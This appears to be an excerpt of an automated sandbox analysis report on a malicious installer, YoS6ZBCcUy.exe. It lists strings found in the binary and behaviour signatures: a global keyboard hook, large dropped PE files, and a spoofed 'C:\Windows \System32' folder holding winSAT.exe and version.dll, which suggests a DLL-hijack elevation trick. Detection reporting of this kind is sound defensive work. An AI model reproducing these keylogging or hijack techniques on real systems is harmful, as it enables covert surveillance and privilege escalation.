Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-manual-write-with-backpressure
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/#example-rbs-pull
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#eqn-modulo
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-HostLoadImportedModule.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-timeclip
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-tonumber
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#table-typeof-operator-results
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security).
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tukaani.org/xz/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tukaani.org/xz/&gt;.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/intent/user?screen_name=troygoode)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/cliui
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/yargs-parser
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparams
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/docs/stack-trace-api#customizing-stack-traces.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/docs/stack-trace-api.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/#creating-revoking
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/aria/#aria-hidden.Blocked
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dom-performance-setresourcetimingbuffersize
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/uievents/#legacy-event-types)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webcrypto/#SubtleCrypto-method-wrapKey
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webcrypto/#algorithm-normalization-normalize-an-algorithm
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#Exposed
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#Exposed.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-converttoint
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#abstract-opdef-integerpart
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-DOMString
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#es-invoking-callback-functions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webkit.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://websockets.spec.whatwg.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5738264052891648
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromestatus.com/feature/5738264052891648Renderer.Font.PrimaryFont.FCPRenderer.Font.Prim
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromium.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cl.cam.ac.uk/%7Emgk25/ucs/utf8_check.c
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.khronos.org/registry/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/wrap-ansi
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.opensource.org/licenses/bsd-license.php)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.patreon.com/feross
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8288.html#section-3
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sysinternals.com0
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/copyright.html.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#interface-formdata
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yargs.js.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zod.dev

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461
Source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_a7e84da4-1

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile dump: NSIS.exe.0.dr 188826112Jump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile dump: NSIS.exe0.0.dr 188826112Jump to dropped file
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeProcess Stats: CPU usage > 49%
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78101A42C NtDeviceIoControlFile,19_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9AE84 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9AE84
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,19_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9AEC1 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,22_2_00007FF780F9AEC1
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78101A42C NtDeviceIoControlFile,22_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,22_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9AEC1 RtlNtStatusToDosError,NtClose,GetLastError,LoadLibraryW,GetProcAddress,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,31_2_00007FF780F9AEC1
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78101A42C NtDeviceIoControlFile,31_2_00007FF78101A42C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9A858 RtlInitUnicodeString,NtOpenFile,RtlNtStatusToDosError,RtlNtStatusToDosError,31_2_00007FF780F9A858
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78101A42C: NtDeviceIoControlFile,19_2_00007FF78101A42C
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\WindowsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\winSAT.exeJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\version.dllJump to behavior
Source: C:\Windows \System32\winSAT.exeFile created: C:\Windows\Performance\WinSAT\winsat.log
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00406B150_2_00406B15
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004072EC0_2_004072EC
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00404C9E0_2_00404C9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B4208CD16_2_00007FFD9B4208CD
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD0A7819_2_00007FF780FD0A78
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FDA9C419_2_00007FF780FDA9C4
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9BD0C19_2_00007FF780F9BD0C
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FA53B819_2_00007FF780FA53B8
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FDA62C19_2_00007FF780FDA62C
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FDBEF819_2_00007FF780FDBEF8
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD688419_2_00007FF780FD6884
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD909019_2_00007FF780FD9090
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE510819_2_00007FF780FE5108
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF781019BA422_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FB327022_2_00007FF780FB3270
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9B82022_2_00007FF780F9B820
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD517822_2_00007FF780FD5178
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FDA9C422_2_00007FF780FDA9C4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9C32A22_2_00007FF780F9C32A
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FA53B822_2_00007FF780FA53B8
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FDA62C22_2_00007FF780FDA62C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FDBEF822_2_00007FF780FDBEF8
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780F9B82022_2_00007FF780F9B820
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD688422_2_00007FF780FD6884
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD909022_2_00007FF780FD9090
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FE510822_2_00007FF780FE5108
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD57AC22_2_00007FF780FD57AC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251B6822_2_00007FFE10251B68
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251CEC22_2_00007FFE10251CEC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1025953822_2_00007FFE10259538
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF781019BA431_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FB327031_2_00007FF780FB3270
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9B82031_2_00007FF780F9B820
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD517831_2_00007FF780FD5178
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FDA9C431_2_00007FF780FDA9C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9C32A31_2_00007FF780F9C32A
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FA53B831_2_00007FF780FA53B8
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FDA62C31_2_00007FF780FDA62C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FDBEF831_2_00007FF780FDBEF8
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780F9B82031_2_00007FF780F9B820
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD688431_2_00007FF780FD6884
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD909031_2_00007FF780FD9090
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FE510831_2_00007FF780FE5108
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD57AC31_2_00007FF780FD57AC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE295F031_2_00007FFDFFE295F0
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE4CC2831_2_00007FFDFFE4CC28
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE453DC31_2_00007FFDFFE453DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE4525831_2_00007FFDFFE45258
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FDB218 appears 81 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FDC700 appears 144 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FCE694 appears 62 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FCA818 appears 72 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FCF3B4 appears 72 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FE3F68 appears 66 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FDB318 appears 76 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FA9C0C appears 230 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FA8010 appears 783 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FCE3AC appears 521 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FCEDC4 appears 40 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FA9210 appears 109 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FA44DC appears 51 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FAA48C appears 48 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FAA080 appears 54 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780F930F0 appears 132 times
Source: C:\Windows \System32\winSAT.exeCode function: String function: 00007FF780FA8B64 appears 40 times
Source: YoS6ZBCcUy.exeStatic PE information: invalid certificate
Source: NSIS.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: NSIS.exe0.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: NSIS.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: NSIS.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.1961131142.0000000005316000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBGInfo.exe. vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2092730468.0000000004754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename* vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs YoS6ZBCcUy.exe
